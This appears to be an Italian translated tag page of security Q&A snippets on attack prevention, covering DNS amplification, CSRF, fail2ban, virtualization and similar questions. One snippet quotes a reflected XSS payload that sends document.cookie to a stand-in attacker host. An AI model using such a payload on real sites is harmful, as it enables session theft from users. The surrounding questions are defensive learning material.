Domande con tag 'attack-prevention'

2
risposte

Come posso rilevare / resistere all'attacco di amplificazione DNS?

Sono uno sviluppatore e sto cercando di capire come procedere per consentire alla mia applicazione di resistere ad attacchi di tipo amplificazione DNS. Tali metodi di prevenzione potrebbero aiutare anche contro gli attacchi di tipo DOS? Quali so...
posta 12.03.2012 - 20:18
3
risposte

è sicuro consentire l'aggiunta di immagini esterne a Blog o a qualsiasi contenuto Web?

Sto filtrando tutte le immagini allegate a qualsiasi contenuto del mio blog: Controlla l'estensione del file. Verifica il tipo di contenuto utilizzando $finfo = finfo_open(FILEINFO_MIME_TYPE); Ho anche salvato l'immagine temporaneam...
posta 04.03.2013 - 21:56
3
risposte

La virtualizzazione come livello di sicurezza per i computer desktop?

Data la quantità di plug-in di terze parti necessari per navigare sul Web, sono stato costretto a virtualizzare le mie abitudini online per ottenere un ulteriore livello di sicurezza. Ovviamente ci sono alcuni ovvi inconvenienti: 1) È nece...
posta 29.06.2011 - 21:04
2
risposte

Checksum di pacchetti

Recentemente ho appreso che ogni pacchetto include byte di checksum e che il computer richiederà di nuovo il pacchetto se i checksum non corrispondono. In che modo i seguenti attacchi sconfiggono tale salvaguardia? Spoofing ARP - Presumo che...
posta 23.08.2014 - 05:34
3
risposte

come un iframe può causare xsrf?

So come un tag form è incline a CSRF che non usa alcun token (o qualsiasi altro meccanismo di challenge-response) ma mi chiedevo come un iFrame possa essere usato per causare l'attacco XSRF e quali sarebbero le tecniche di mitigazione? Di seguit...
posta 21.11.2011 - 13:56
1
risposta

Qual è l'impostazione predefinita di fail2ban per i tentativi di accesso SSH?

Ho provato a bloccarmi dal mio server per verificare se fail2ban funziona correttamente, quindi ho provato l'accesso a ssh e ho usato una password errata all'infinito. Ma sono stato bloccato solo dopo 13 accessi falliti invece del default 6 fall...
posta 16.12.2012 - 04:26
3
risposte

Qual è il modo (letteralmente) più leggero per eseguire un secondo sistema sicuro?

Il mio obiettivo è avere due sistemi separati in cui uno è sicuro anche se il secondo è pieno di malware. Il mio attuale approccio è di avere due laptop separati e l'unico modo in cui questi due comunicano tra loro è l'invio di messaggi di testo...
posta 05.09.2018 - 17:30
2
risposte

Uso di skype per un attacco

Sono curioso di qualcosa; diciamo che qualcuno mi ha aggiunto in modo casuale a Skype e ho provato ad avviare una chat con me e voglio saperne di più su di loro ma sono preoccupato se possono fare qualche danno. La mia domanda è: quanto sareb...
posta 10.01.2014 - 15:04
1
risposta

Attacco XSS riflesso tramite richiesta POST e payload XML

So che un XSS riflesso può essere fatto con una richiesta GET come: http://site.com?search=<script>location.href='http://hackers.com?sessionToken='+document.cookie;</script> Finché la risposta è simile a questa: <html>...
posta 15.09.2013 - 22:30
1
risposta

CSRF con intestazioni Autorizzazione OAuth o Bearer

Sto progettando un'API RESTful che deve essere accessibile da un browser web. L'API è protetta dall'autenticazione di base. Comprendo il concetto di CSRF e le mitigazioni proposte (ho trovato sia voce CSRF di Wikipedia che pagina OWASP CSR...
posta 13.03.2013 - 19:00